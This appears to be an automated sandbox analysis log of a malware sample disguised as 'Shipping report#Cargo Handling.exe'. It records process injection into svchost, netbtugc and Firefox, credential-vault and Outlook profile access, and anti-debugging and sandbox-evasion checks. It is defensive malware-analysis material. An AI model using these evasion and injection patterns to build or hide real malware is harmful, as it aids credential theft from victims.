Source: unknown	Process created: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe "C:\Users\user\Desktop\Shipping report#Cargo Handling.exe"
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping report#Cargo Handling.exe"
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Shipping report#Cargo Handling.exe"	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe	Section loaded: fwpuclnt.dll	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: Shipping report#Cargo Handling.exe

Static file information: File size 1719296 > 1048576

Source: Shipping report#Cargo Handling.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Shipping report#Cargo Handling.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Shipping report#Cargo Handling.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Shipping report#Cargo Handling.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Shipping report#Cargo Handling.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Shipping report#Cargo Handling.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: Shipping report#Cargo Handling.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tfTpvPSAdwQ.exe, 00000005.00000002.3122668683.00000000000DE000.00000002.00000001.01000000.00000005.sdmp, tfTpvPSAdwQ.exe, 00000007.00000002.3122704527.00000000000DE000.00000002.00000001.01000000.00000005.sdmp
Source:	Binary string: wntdll.pdbUGP source: Shipping report#Cargo Handling.exe, 00000000.00000003.1877199075.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, Shipping report#Cargo Handling.exe, 00000000.00000003.1875419780.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2347446716.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2249045941.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2347446716.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2251065827.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3123980147.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2347219047.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3123980147.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2349415767.0000000002B51000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Shipping report#Cargo Handling.exe, 00000000.00000003.1877199075.00000000040B0000.00000004.00001000.00020000.00000000.sdmp, Shipping report#Cargo Handling.exe, 00000000.00000003.1875419780.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.2347446716.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2249045941.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2347446716.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2251065827.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, netbtugc.exe, 00000006.00000002.3123980147.0000000002E9E000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2347219047.00000000029AA000.00000004.00000020.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000002.3123980147.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, netbtugc.exe, 00000006.00000003.2349415767.0000000002B51000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdb source: svchost.exe, 00000001.00000003.2313854482.0000000002A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2347212542.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, tfTpvPSAdwQ.exe, 00000005.00000002.3123205892.00000000010E8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: netbtugc.pdbGCTL source: svchost.exe, 00000001.00000003.2313854482.0000000002A13000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2347212542.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, tfTpvPSAdwQ.exe, 00000005.00000002.3123205892.00000000010E8000.00000004.00000020.00020000.00000000.sdmp

Source: Shipping report#Cargo Handling.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Shipping report#Cargo Handling.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Shipping report#Cargo Handling.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Shipping report#Cargo Handling.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Shipping report#Cargo Handling.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_000942DE

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000B0A76 push ecx; ret	0_2_000B0A89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0043A883 push FFFFFFC7h; retf	1_2_0043AA9A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0043AEA4 push cs; retf	1_2_0043AEAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004336B0 push eax; ret	1_2_004336B2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004387F2 push ecx; iretd	1_2_004387FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0300225F pushad ; ret	1_2_030027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030027FA pushad ; ret	1_2_030027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030309AD push ecx; mov dword ptr [esp], ecx	1_2_030309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0300283D push eax; iretd	1_2_03002858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0300135E push eax; iretd	1_2_03001369
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02D309AD push ecx; mov dword ptr [esp], ecx	6_2_02D309B6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_001210B0 push es; retf 6D50h	6_2_0012119D
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_0011513F push ecx; iretd	6_2_00115148
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_0013017D push ebp; ret	6_2_001301F3
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_001171D0 push FFFFFFC7h; retf	6_2_001173E7
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_001177F1 push cs; retf	6_2_001177F9
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_00130AAF push es; iretd	6_2_00130AB0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_00130ACF push ds; iretd	6_2_00130AD0
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_00133C70 push edi; iretd	6_2_00133C7B
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_0011DDB9 push ss; rep ret	6_2_0011DDC1
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_0011DDC3 push ss; rep ret	6_2_0011DDC1
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02A5D23A pushad ; ret	6_2_02A5D23C
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02A5638E push cx; retf	6_2_02A56390
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02A550E3 push 86FB9775h; ret	6_2_02A550EA
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02A570C9 push es; retf	6_2_02A570D5
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02A5EFC8 push ebx; iretd	6_2_02A5F03E
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02A55CFE push ecx; retf	6_2_02A55D06
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02A55D94 push es; iretd	6_2_02A55DA6
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_02A55D22 pushad ; iretd	6_2_02A55D23

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000AF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		0_2_000AF98E
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_00121C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		0_2_00121C41

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

graph_0-96825

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	API/Special instruction interceptor: Address: 352868C
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFE2220D324
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFE2220D7E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFE2220D944
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFE2220D504
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFE2220D544
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFE2220D1E4
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFE22210154
Source: C:\Windows\SysWOW64\netbtugc.exe	API/Special instruction interceptor: Address: 7FFE2220DA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0307096E rdtsc

1_2_0307096E

Source: C:\Windows\SysWOW64\netbtugc.exe	Window / User API: threadDelayed 2906			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Window / User API: threadDelayed 7066			Jump to behavior

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	API coverage: 3.5 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\netbtugc.exe	API coverage: 3.1 %

Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6988	Thread sleep count: 2906 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6988	Thread sleep time: -5812000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6988	Thread sleep count: 7066 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe TID: 6988	Thread sleep time: -14132000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\hnpfJeltBUPVzBeYBfRGXmIlUDDfPORbVWAFPoepSQkyGPmBFtrDhFvHggVwOxOFOCwJuXKKCnQu\tfTpvPSAdwQ.exe TID: 3052	Thread sleep time: -35000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\netbtugc.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_001068EE FindFirstFileW,FindClose,	0_2_001068EE
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_0010698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_0010698F
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000FD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_000FD076
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000FD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_000FD3A9
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_00109642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00109642
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_0010979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0010979D
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_00109B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00109B2B
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000FDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_000FDBBE
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_00105C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00105C97
Source: C:\Windows\SysWOW64\netbtugc.exe	Code function: 6_2_0012C0D0 FindFirstFileW,FindNextFileW,FindClose,	6_2_0012C0D0

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_000942DE

Source: tfTpvPSAdwQ.exe, 00000007.00000002.3123433130.00000000005EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: netbtugc.exe, 00000006.00000002.3123044826.00000000007AE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: firefox.exe, 00000009.00000002.2693262000.0000021BF90FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllYY

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\netbtugc.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_0307096E rdtsc

1_2_0307096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 1_2_00447703 LdrLoadDll,

1_2_00447703

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_0010EAA2 BlockInput,

0_2_0010EAA2

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000C2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_000C2622

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe

Code function: 0_2_000942DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_000942DE

Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_000B4CE8 mov eax, dword ptr fs:[00000030h]	0_2_000B4CE8
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_03528958 mov eax, dword ptr fs:[00000030h]	0_2_03528958
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_035288F8 mov eax, dword ptr fs:[00000030h]	0_2_035288F8
Source: C:\Users\user\Desktop\Shipping report#Cargo Handling.exe	Code function: 0_2_035272D8 mov eax, dword ptr fs:[00000030h]	0_2_035272D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]	1_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]	1_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0306A30B mov eax, dword ptr fs:[00000030h]	1_2_0306A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302C310 mov ecx, dword ptr fs:[00000030h]	1_2_0302C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03050310 mov ecx, dword ptr fs:[00000030h]	1_2_03050310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]	1_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03108324 mov ecx, dword ptr fs:[00000030h]	1_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]	1_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03108324 mov eax, dword ptr fs:[00000030h]	1_2_03108324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B2349 mov eax, dword ptr fs:[00000030h]	1_2_030B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov ecx, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030B035C mov eax, dword ptr fs:[00000030h]	1_2_030B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030FA352 mov eax, dword ptr fs:[00000030h]	1_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D8350 mov ecx, dword ptr fs:[00000030h]	1_2_030D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0310634F mov eax, dword ptr fs:[00000030h]	1_2_0310634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030D437C mov eax, dword ptr fs:[00000030h]	1_2_030D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]	1_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]	1_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0302E388 mov eax, dword ptr fs:[00000030h]	1_2_0302E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]	1_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0305438F mov eax, dword ptr fs:[00000030h]	1_2_0305438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03028397 mov eax, dword ptr fs:[00000030h]	1_2_03028397
